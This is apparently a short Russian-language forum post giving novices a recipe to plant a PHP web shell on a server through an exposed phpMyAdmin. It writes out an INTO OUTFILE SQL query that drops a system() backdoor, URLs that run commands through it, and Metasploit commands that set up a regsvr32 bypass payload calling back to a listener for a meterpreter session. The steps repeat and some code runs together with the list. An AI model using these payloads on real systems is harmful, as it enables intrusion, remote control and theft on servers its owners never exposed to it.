Старая добрая загрузка шелла на сервер через имеющийся PhpMyAdmin. Ничего нового, но новичкам напоминание в копилочку. сам сегодня заюзал, решил напомнить
1. создаем базу или идем в имеющуюся
2. Затем, выбрав эту базу данных, идем в поле SQL, выполняем SQL запрос.
3. попробуем обратиться к серверу по заданному пути и названию
4. выполнение команд
5. если нужно получить активную сессию meterpreter , тогда запускаем
6. полученный результат работы экспа добавляем в команду:
7. получаем активную сессию meterpreter.
Новое - хорошо забытой старое
1. создаем базу или идем в имеющуюся
2. Затем, выбрав эту базу данных, идем в поле SQL, выполняем SQL запрос.
Код:
SELECT “<?php system($_GET[‘cmd’]); ?>” into outfile “\ваш путь\backdoor.php”site.ru/backdoor.php4. выполнение команд
Код:
site.ru/backdoor.php?cmd=systeminfoMsfconsole и используем следующий эксплоит:
Код:
use exploit/windows/misc/regsvr32_applocker_bypass_server
set lhost 172.16.0.192
set lport 4444
exploit
Код:
site.ru/backdoor.php?cmd=полученный результатНовое - хорошо забытой старое